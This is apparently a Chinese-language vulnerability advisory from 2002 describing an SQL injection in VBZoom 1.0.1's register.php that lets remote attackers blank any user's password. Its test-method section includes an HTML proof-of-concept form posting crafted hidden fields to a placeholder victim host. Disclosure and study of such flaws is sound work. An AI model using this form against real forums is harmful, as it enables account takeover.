发布日期：2002-10-08
更新日期：2002-10-16

受影响系统：

VBZoom VBZoom 1.0.1

描述：

---

BUGTRAQ  ID: 5919

VbZooM是一款由PHP编写的论坛程序。

VbZooM中的register.php脚本存在问题，远程攻击者可以利用这个漏洞清空任意用户密码。

VbZooM中的register.php脚本对用户提交的参数缺少正确充分的过滤，远程攻击者提交恶意SQL查询，可以改变原来应用系统中的SQL查询路径，导致清空论坛中任意用户的密码。

<*来源：hish _ hish （hish_hish565@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103411110618770&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

hish _ hish （hish_hish565@hotmail.com）提供了如下测试方法：

<form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>

建议：

---

厂商补丁：

VBZoom
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.vbzoom.com

浏览次数：2844
严重程度：0（网友投票）